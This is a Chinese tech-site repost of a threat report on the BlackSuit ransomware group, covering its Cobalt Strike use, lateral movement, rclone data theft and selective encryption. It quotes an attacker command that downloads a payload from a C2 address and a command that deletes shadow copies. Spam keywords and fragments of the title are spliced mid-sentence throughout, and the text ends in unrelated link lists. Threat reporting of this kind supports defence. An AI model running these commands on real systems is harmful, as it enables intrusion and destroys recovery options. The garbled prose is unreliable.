您现在的位置是:亿华灵动 > 电脑教程
BlackSuit:Royal/Conti改头换面重出江湖,新型勒索软件以速度、隐蔽性和数据窃取为特征
亿华灵动2025-11-26 18:46:25【电脑教程】7人已围观
简介高度协同的破坏性勒索活动Cybereason最新调查揭露,BlackSuit勒索软件组织臭名昭著的Royal和Conti威胁组织的重组后继者)正在实施一场高度协同的破坏性勒索活动。该活动融合了隐蔽性、
Cybereason最新调查揭露,BlackSuit勒索软件组织(臭名昭著的面重Royal和Conti威胁组织的重组后继者)正在实施一场高度协同的破坏性勒索活动。该活动融合了隐蔽性、出江速度和精准打击能力,湖新和数堪称今年最复杂的型勒勒索软件攻击之一 。亿华云
Cybereason在报告中指出:"BlackSuit是索软2023年年中出现的勒索软件组织 ,被广泛认为是速据窃Royal勒索团伙的改头换面或分支 。"

与传统仅关注加密的度隐勒索攻击不同,BlackSuit采用三阶段杀伤链:初始入侵、云计算蔽性数据窃取和选择性加密 ,头换特征并辅以数据删除手段破坏恢复工作 。面重
攻击始于部署Cobalt Strike信标实现命令控制(C2)和横向移动。出江虽然初始入侵途径尚不明确,湖新和数但分析人员注意到早期流量来自未安装Cybereason传感器的型勒设备,表明系统早已被攻陷 。索软
研究团队强调:"Cobalt Strike被确认为BlackSuit勒索软件的主要攻击工具。源码下载"

BlackSuit采用多种技术实现横向移动:
通过PsExec.exe在C:\Windows\Temp目录分发执行vm.dll和vm80.dll等载荷创建具有System权限的RPC服务使用Configure-SMRemoting.exe建立远程桌面连接从网络共享执行frdke23.exe等可疑二进制文件,通过rundll32.exe将代码注入wuauclt.exe等合法进程这些技术使攻击者能在全网进行广泛侦察和载荷部署的同时保持隐蔽性。
载荷投递与执行特征攻击者使用如下PowerShell命令下载Cobalt Strike信标 :
复制invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll1.同一C2基础设施被用于投递最终载荷——通过重命名为b.exe和vmware.dll等文件部署BlackSuit勒索软件 。一个异常特征是执行时使用了-nomutex标志 :
"与典型勒索行为不同...-nomutex标志禁用互斥体创建...允许并发多实例执行——可能是为了实现冗余、加速跨会话加密或规避基于互斥体的模板下载检测 。"
双重勒索与破坏恢复加密前 ,攻击者使用伪装成vmware.exe的rclone.exe窃取约60GB敏感数据 。这反映了双重勒索策略的流行趋势——通过预先窃取数据增加赎金压力 。
为破坏系统恢复 ,攻击者使用vssadmin.exe删除卷影副本:
复制vssadmin delete shadows /all /quiet1.随后立即执行勒索软件 ,仅针对特定文件类型加密 ,服务器租用同时排除Windows 、IPC$和ADMIN$等系统关键文件夹以避免业务中断 。
精心设计的加密逻辑BlackSuit的加密逻辑针对性能和隐蔽性进行了优化,避免加密.exe、.dll和.BlackSuit文件,并投放勒索说明。
源码库很赞哦!(57549)
上一篇: 英特尔AI 模型压缩器现满分漏洞,可导致任意代码执行
下一篇: 识破网络钓鱼企图的十个方法
相关文章
- 从“多样性”角度看待加密?
- 揭秘外星人152718S(科幻现实融合的探索之旅)
- 苹果iOS9.2系统的卓越功能与优势(解析iOS9.2的重要更新及用户体验提升)
- 中科芯片(以中科芯片为引领,中国芯片产业迈入崭新时代)
- 国际刑警查获五千万美元,逾两千名“社会工程师”被捕
- 通达信科OA系统的优势及应用领域分析(实现高效办公、提升企业竞争力的必备工具)
- 索尼MDREX250AP耳机的品质与功能评测(优质音质和舒适佩戴体验,探索索尼MDREX250AP的魅力)
- GTS450显卡的性能与特点剖析(探索GTS450显卡的卓越性能和出色特点)
- 企业建立网络安全文化的五个技巧
- 探索会动的手表的魅力与未来(将时间穿戴于腕间,会动的手表让生活更有趣)
热门文章
站长推荐
友情链接
- Realtek 蓝牙安全连接配对漏洞可导致攻击者发起拒绝服务攻击
- W7硬盘系统安装教程(简单易懂的W7硬盘系统安装教程,让你轻松搭建个人电脑)
- 2022年及以后的四个数据中心提示
- 戴尔Latitude 5420商务笔记本 优质体验 胜任多种办公需求
- 压测利器 Apache Bench:快速上手,服务器性能一测就“露馅”!
- 一键2009点了会有什么神奇的事情发生?(探索电脑神秘力量的奇妙之旅)
- 神舟战神K540D-i7D2笔记本电脑的性能和用户体验(一款高性能笔记本电脑的推荐及评测)
- 托管服务提供商的优势和长期机会
- GitHub成为欧洲恶意软件传播的首选平台
- 戴尔易安信加固过的机箱,保证在远程和恶劣环境下工作的可靠性,满足边缘工作负载不断增长的需求 企业服务器b2b信息平台源码库网站建设香港物理机云服务器亿华云







